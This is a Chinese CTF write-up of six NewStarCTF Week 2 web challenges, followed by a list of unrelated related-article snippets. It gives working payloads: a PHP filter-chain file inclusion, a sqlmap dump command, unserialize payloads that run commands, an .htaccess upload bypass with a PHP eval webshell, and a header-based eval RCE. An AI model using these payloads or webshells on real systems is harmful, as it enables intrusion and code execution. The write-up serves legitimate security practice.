当前位置: 首页 > news >正文

【Web】NewStarCtf Week2 个人复现

news 2026/4/12 16:49:51

目录

①游戏高手

②include 0。0 

③ez_sql

④Unserialize? 

⑤Upload again!

⑥ R!!C!!E!!

①游戏高手

经典前端js小游戏

检索与分数相关的变量 

 

 控制台直接修改分数拿到flag

②include 0。0 

禁了base64和rot13 

尝试过包含/var/log/apache/access.log,php://input和data://均不行

没法子,只能上网检索别的过滤器了

payload

?file=php://filter//convert.iconv.SJIS*.UCS-4*/resource=flag.php

③ez_sql

在url发现注入点

 

sqlmap梭了 

python sqlmap.py -u "http://946dccab-ab98-4042-9583-64c9f46eaf8f.node4.buuoj.cn:81/?id=TMP0919" -D ctf -T here_is_flag -C flag --dump

 

④Unserialize? 

构造:

<?phpclass evil {private $cmd = 'ls /';
}
$a = new evil();
echo (serialize($a));

不可见字符用%00代替 

payload:

unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:4:"ls /";}
unser=O:4:"evil":1:{s:9:"%00evil%00cmd";s:33:"nl /th1s_1s_fffflllll4444aaaggggg";}

⑤Upload again!

经过尝试不能上传php文件(后缀检测绕不过) 

随便输一段报错发现是apache

上传.htaccess

#define width 100;
#define height 100;
SetHandler application/x-httpd-php

上传yjh.png

GIF89a
<script language="php">eval($_POST[1]);</script>

 回显路径,访问连蚁剑即可

 

 

⑥ R!!C!!E!!

进来先让信息搜集

盲测/.git/,报Forbidden,说明是.git源码泄露

 一眼无参rce,过滤了一些东西

先打打看

/bo0g1pop.php?star=print_r(getallheaders());

回显

发现UA在第二个

payload:

/bo0g1pop.php?star=eval(next(getallheaders()));

 改UA即可

 

相关文章:

【Web】NewStarCtf Week2 个人复现

目录 ①游戏高手 ②include 0。0 ③ez_sql ④Unserialize&#xff1f; ⑤Upload again! ⑥ R!!C!!E!! ①游戏高手 经典前端js小游戏 检索与分数相关的变量 控制台直接修改分数拿到flag ②include 0。0 禁了base64和rot13 尝试过包含/var/log/apache/access.log,ph…...

编程日记 2023/11/29 0:22:30

Python实现Windows服务自启动、禁用、启动、停止、删除

如果一个程序被服务监管&#xff0c;那么仅仅kill程序是无用的&#xff0c;还要把服务关掉 import win32service import win32serviceutildef EnableService(service_name):try:# 获取服务管理器scm win32service.OpenSCManager(None, None, win32service.SC_MANAGER_ALL_ACC…...

编程日记 2023/11/29 0:21:27

【华为OD题库-043】二维伞的雨滴效应-java

题目 普通的伞在二维平面世界中&#xff0c;左右两侧均有一条边&#xff0c;而两侧伞边最下面各有一个伞坠子&#xff0c;雨滴落到伞面&#xff0c;逐步流到伞坠处&#xff0c;会将伞坠的信息携带并落到地面&#xff0c;随着日积月累&#xff0c;地面会呈现伞坠的信息。 1、为了…...

编程日记 2023/11/29 0:20:27

百度手机浏览器关键词排名优化——提升关键词排名 开源百度小程序源码系统 附带完整的搭建教程

百度作为国内领先的搜索引擎&#xff0c;一直致力于为用户提供最优质的信息服务。在移动互联网时代&#xff0c;手机浏览器成为了用户获取信息的主要渠道。而小程序作为轻量级的应用程序&#xff0c;具有即用即走、无需下载等优势&#xff0c;越来越受到用户的青睐。然而&#…...

编程日记 2023/11/29 0:19:25

Git 的基本概念和使用方式。

Git 是一个开源的分布式版本控制系统&#xff0c;它可以记录代码的修改历史&#xff0c;跟踪文件的版本变化&#xff0c;并支持多人协同开发。Git 的基本概念包括&#xff1a; 1. 仓库&#xff08;Repository&#xff09;&#xff1a;存放代码和版本历史记录的地方。 2. 分支…...

编程日记 2023/11/29 0:18:24

MarkDown学习

MarkDown学习 标题 三级标题 四级标题 字体 加粗&#xff08;两侧加两个星号&#xff09;&#xff1a;Hello&#xff0c;World! 斜体&#xff08;两侧加一个星号&#xff09;&#xff1a;Hello&#xff0c;World! 加粗加斜体&#xff08;两侧加三个星号&#xff09;&#xff1a…...

编程日记 2023/11/29 0:17:23

案例:某电子产品电商平台借助监控易保障网络正常运行

一、背景介绍 某电子产品电商平台是一家专注于电子产品销售的电商平台&#xff0c;拥有庞大的用户群体和丰富的产品线。随着业务规模的不断扩大&#xff0c;网络设备的数量和复杂性也不断增加&#xff0c;网络故障和性能问题时有发生&#xff0c;给平台的稳定运行带来了很大的挑…...

编程日记 2023/11/29 0:16:22

IntelliJ IDEA 中有什么让你相见恨晚的技巧

一、条件断点 循环中经常用到这个技巧&#xff0c;比如&#xff1a;遍历1个大List的过程中&#xff0c;想让断点停在某个特定值。 参考上图&#xff0c;在断点的位置&#xff0c;右击断点旁边的小红点&#xff0c;会出来一个界面&#xff0c;在Condition这里填入断点条件即可&…...

编程日记 2023/11/29 0:15:22

游戏被攻击了怎么办

随着网络技术和网络应用的发展&#xff0c;网络安全问题显得越来越重要&#xff0c;在创造一个和谐共赢的互联网生态环境的路途中总是会遇到各种各样的问题。最常见的当属于DDOS攻击&#xff08;Distributed Denial of Service&#xff09;即分布式阻断服务。由于容易实施、难以…...

编程日记 2023/11/29 0:14:21

MySQL 索引类型

什么是索引&#xff1f; 索引是一种用于提高数据库查询性能的数据结构。它是在表中一个或多个列上创建的&#xff0c;可以加快对这些列的数据检索速度。 索引的作用是通过创建一个额外的数据结构&#xff0c;使得数据库可以更快地定位和访问数据。当执行查询语句时&#xff0c…...

编程日记 2023/11/29 0:13:20

哈希表——闭散列表

该哈希表实现是闭散列实现法。 闭散列表&#xff1a; 闭散列&#xff1a;也叫开放定址法&#xff0c;当发生哈希冲突时&#xff0c;如果哈希表未被装满&#xff0c;说明在哈希表中必然还有空位置&#xff0c;那么可以把key存放到冲突位置中的“下一个” 空位置中去。 那如何寻…...

编程日记 2023/11/29 0:12:19

【ArcGIS Pro微课1000例】0036:栅格影像裁剪与提取(矢量范围裁剪dem高程数据)

本实验讲解在ArcGIS Pro中进行栅格影像裁剪与提取(矢量范围裁剪dem高程数据)的方法。DEM、DOM、DSM等栅格数据方法也可以实现。 文章目录 一、加载实验数据二、裁剪工具的使用1. 裁剪栅格2. 按掩膜提取一、加载实验数据 加载配套实验数据包中的0036.rar中的dem数据和矢量裁剪…...

编程日记 2023/11/29 0:11:18

Doris-Routine Load(二十七)

例行导入&#xff08;Routine Load&#xff09;功能为用户提供了一种自动从指定数据源进行数据导入的功能。 适用场景 当前仅支持从 Kafka 系统进行例行导入&#xff0c;使用限制&#xff1a; &#xff08;1&#xff09;支持无认证的 Kafka 访问&#xff0c;以及通过 SSL 方…...

编程日记 2023/11/29 0:10:17

linux驱动.之 网络udp应用层测试工具demon(一)

绑定vlan&#xff0c;网卡的demon&#xff0c;如果有多个网卡&#xff0c;多个vlan&#xff0c;网卡的ip设置成一致&#xff0c;那就不能只简单绑定ip来创建socket&#xff0c; 需要绑定网卡设备 客户端udp_client.c #include <stdio.h> #include <string.h> #inc…...

编程日记 2023/11/29 0:09:15

【Flutter】graphic图表的快速上手

简介 graphic是一个数据可视化语法和Flutter图表库。 官方github示例 网上可用资源很少,只有作者的几篇文章,并且没有特别详细的文档,使用的话还是需要一定的时间去调研,在此简单记录。 示例 以折线图为例(因为我只用到了折线图,但其他的图大差不差) 创建一个两个文…...

编程日记 2023/11/29 0:08:15

DeepMind 推出 OPRO 技术,可用于优化 ChatGPT 提示

本心、输入输出、结果 文章目录 DeepMind 推出 OPRO 技术&#xff0c;可用于优化 ChatGPT 提示前言消息摘要OPRO的工作原理DeepMind的研究相关链接花有重开日&#xff0c;人无再少年实践是检验真理的唯一标准 DeepMind 推出 OPRO 技术&#xff0c;可用于优化 ChatGPT 提示 编辑…...

编程日记 2023/11/29 0:07:13

企业网络中的身份安全

随着近年来数字化转型的快速发展&#xff0c;企业使用的数字身份数量急剧增长。身份不再仅仅局限于用户。它们现在扩展到设备、应用程序、机器人、第三方供应商和组织中员工以外的其他实体。即使在用户之间&#xff0c;也存在不同类型的身份&#xff0c;例如属于IT管理员、远程…...

编程日记 2023/11/29 0:06:12

智能优化算法应用:基于正余弦算法无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于正余弦算法无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于正余弦算法无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.正余弦算法4.实验参数设定5.算法结果6.参考文献7.…...

编程日记 2023/11/29 0:04:10

创建一个带有背景图层和前景图层的渲染窗口

开发环境&#xff1a; Windows 11 家庭中文版Microsoft Visual Studio Community 2019VTK-9.3.0.rc0vtk-example demo解决问题&#xff1a; 创建一个带有背景图层和前景图层的渲染窗口&#xff0c;知识点&#xff1a;1. 画布转image&#xff1b;2. 渲染图层设置&#xff1b;3.…...

编程日记 2023/11/29 0:02:08

Docker 运行 Oracle Autonomous Database Free Container

​ Docker 运行 Oracle Autonomous Database Free Container Oracle Autonomous Database Free Container Image 介绍通过 Docker 运行 Oracle Autonomous Database Free ContainerWallet 配置可用的 TNS 别名MY_ATP TNS 别名MY_ADW TNS 别名连接到 Oracle Autonomous Databas…...

编程日记 2023/11/29 0:01:07

UE5 Modify Curve 蓝图节点:五种 Apply Modes 的实战应用解析

1. Modify Curve节点基础&#xff1a;动画曲线的动态操控利器 在UE5动画系统中&#xff0c;Modify Curve节点就像给动画师配了把瑞士军刀。我去年做角色表情动画时&#xff0c;发现传统的关键帧调整方式效率太低&#xff0c;直到用上这个节点才真正体会到实时操控曲线值的快感。…...

编程新知 2026/4/12 16:12:07

别再被推着走了:你不是被动的沙,而是塑造自己的海

《元能力系统:重塑你的内在架构》 第五模块:【进化篇】—— 面向未来的生命架构 (21/21) 从沙到海:生命架构师的觉醒 说句实在话,写这篇结语的时候,我坐在书桌前发了好一会儿呆 。 窗外有风,楼下有人在遛狗,远处有孩子的笑声 。都是平常的日子。但这几个月,咱们一起走…...

编程新知 2026/4/12 16:04:03

OpCore Simplify:黑苹果EFI配置的终极简化工具,30分钟快速搭建macOS系统

OpCore Simplify&#xff1a;黑苹果EFI配置的终极简化工具&#xff0c;30分钟快速搭建macOS系统 【免费下载链接】OpCore-Simplify A tool designed to simplify the creation of OpenCore EFI 项目地址: https://gitcode.com/GitHub_Trending/op/OpCore-Simplify 想要在…...

编程新知 2026/4/12 15:53:59

Avalonia UI ..-RC正式发布前

一、什么是 Q 饱和运算&#xff1f; 1. 核心痛点&#xff1a;普通运算的 “数值回绕” 普通算术运算&#xff08;如 ADD/SUB&#xff09;溢出时&#xff0c;数值会按补码规则 “回绕”&#xff0c;导致结果完全错误&#xff1a; 示例&#xff1a;int8_t 类型最大值 127 1 → 结…...

编程新知 2026/4/12 15:31:30

终极免费AI字幕工具VideoCaptioner:3分钟学会智能视频字幕处理

终极免费AI字幕工具VideoCaptioner&#xff1a;3分钟学会智能视频字幕处理 【免费下载链接】VideoCaptioner &#x1f3ac; 卡卡字幕助手 | VideoCaptioner - 基于 LLM 的智能字幕助手 - 视频字幕生成、断句、校正、字幕翻译全流程处理&#xff01;- A powered tool for easy a…...

编程新知 2026/4/12 15:27:19

DDD难落地?就让AI干吧! - cleanddd-skills介绍粟

AI训练存储选型的演进路线 第一阶段&#xff1a;单机直连时代 早期的深度学习数据集较小&#xff0c;模型训练通常在单台服务器或单张GPU卡上完成。此时直接将数据存储在训练机器的本地NVMe SSD/HDD上。 其优势在于IO延迟最低&#xff0c;吞吐量极高&#xff0c;也就是“数据离…...

编程新知 2026/4/12 15:01:32

PyQt5 高级自定义:打造多功能画笔样式组合下拉框

1. PyQt5自定义组合下拉框的核心价值 在图形界面开发中&#xff0c;画笔样式选择是个高频需求。传统做法是分别使用颜色选择器、滑块控件和单选按钮来实现颜色、粗细和虚线样式的选择&#xff0c;但这会占用大量界面空间。我去年开发一个绘图软件时就遇到这个问题——工具栏被各…...

编程新知 2026/4/12 14:34:56

arXiv订阅进阶玩法:除了邮件,还能用RSS和Python脚本打造你的专属论文追踪器

arXiv订阅进阶玩法&#xff1a;用RSS和Python脚本打造你的专属论文追踪器 每天手动刷新arXiv查看最新论文&#xff1f;对于追求效率的研究者来说&#xff0c;这无异于在已经繁重的科研任务上再添负担。虽然邮件订阅是官方提供的解决方案&#xff0c;但信息过载、分类混乱、被动…...

编程新知 2026/4/12 13:46:24

如何为ThinkPad T480安装macOS:OpenCore完整配置指南

如何为ThinkPad T480安装macOS&#xff1a;OpenCore完整配置指南 【免费下载链接】t480-oc &#x1f4bb; Lenovo ThinkPad T480 / T580 / X280 Hackintosh (macOS Monterey 12.x - Sequoia 15.x) - OpenCore 项目地址: https://gitcode.com/gh_mirrors/t4/t480-oc 还在…...

编程新知 2026/4/12 13:21:53

Trae中Qwen3-Coder-Plus模型实战:提升代码可测试性的智能重构策略

1. 认识Qwen3-Coder-Plus与代码可测试性 第一次接触Qwen3-Coder-Plus时&#xff0c;我正为一个Java服务类缺乏单元测试而头疼。这个阿里开源的代码大模型&#xff0c;能在Trae环境中直接对现有代码进行智能重构。最让我惊讶的是&#xff0c;它不仅能生成符合规范的代码&#xf…...

编程新知 2026/4/12 12:23:02